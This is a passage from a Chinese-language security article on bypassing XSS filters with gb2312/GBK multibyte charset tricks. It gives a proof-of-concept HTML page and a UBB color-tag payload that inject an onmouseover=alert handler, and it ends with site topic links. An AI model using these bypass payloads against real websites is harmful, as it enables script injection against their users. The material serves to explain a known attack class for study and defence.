1 Bypass某些js的检查规则
〈HTML>
〈HEAD>
〈TITLE>80sec test〈/TITLE>
〈meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
〈/HEAD>
〈BODY>
〈script>
window.onerror=function(){
alert('Vul');
return true;
}
〈/script>
〈script>x='〈?php echo chr(0xC1);?>';y='[User_IN_PUT]‘;〈/script>
〈/BODY>
〈/HTML>
这里即使是过滤了〈>’\等字符一样可以利用非法字符集序列来实现\的作用,因为它会把原来存在的’给结合掉,然后前面的’找不到闭合,后面[User_IN_PUT]就可以用来执行js代码了。
2 Bypass某些属性的检查规则
为了避免直接使用html导致出现漏洞,一些论坛和程序使用了UBB标签,但是在gbk等多字节编码下,一样容易出现问题,以最容易出现问题的一个UBB标签为例子:
color=xyz〈?php echo chr(0xC1);?>][/color][color=abc onmouseover=alert(/xss/) s=〈?php echo chr(0xC1);?>]exploited[/color]
0xC1是一个gb2312的第一个字节,上面结果将会转化为:
〈font color="xyz?>〈/font>〈font color="abc onmouseover=alert(/xss/) s=?>exploited〈/font>
其中的
alert(/xss/)
更多内容请看DoS 拒绝服务攻击专题、脚本攻击和防范、DDoS攻击防御与分析专题,或进入讨论组讨论。
相关专题
- DoS 拒绝服务攻击专题 (1310篇文章)
- 脚本攻击和防范 (2478篇文章)
- DDoS攻击防御与分析 (1586篇文章)
- ARP攻击防范与解决方案 (1804篇文章)
- 浏览器安全隐患及对策 (1191篇文章)
- 认识脚本攻击 (62篇文章)
- 6款非主流软件 扫除垃圾打造清爽系统 (350次浏览)
- 清空回收站也能把文件找回来 (90次浏览)
- 网络安全技巧让你畅游网络无阻拦 (81次浏览)
- 对一款病毒(木马)程序的分析 (70次浏览)
- 只防病毒不安全 完美网络安全还需防什么 (56次浏览)
- 电子商务网站建设中的安全问题研究 (42次浏览)
- 教你将文件“秘密”隐藏在图片中 (41次浏览)
- 告别ARP 净化网络环境 (41次浏览)
- 设置网络策略 让访问Windows 2008更安全 (36次浏览)
- IP地址背后牵连个人信息 网络世界无隐私 (34次浏览)
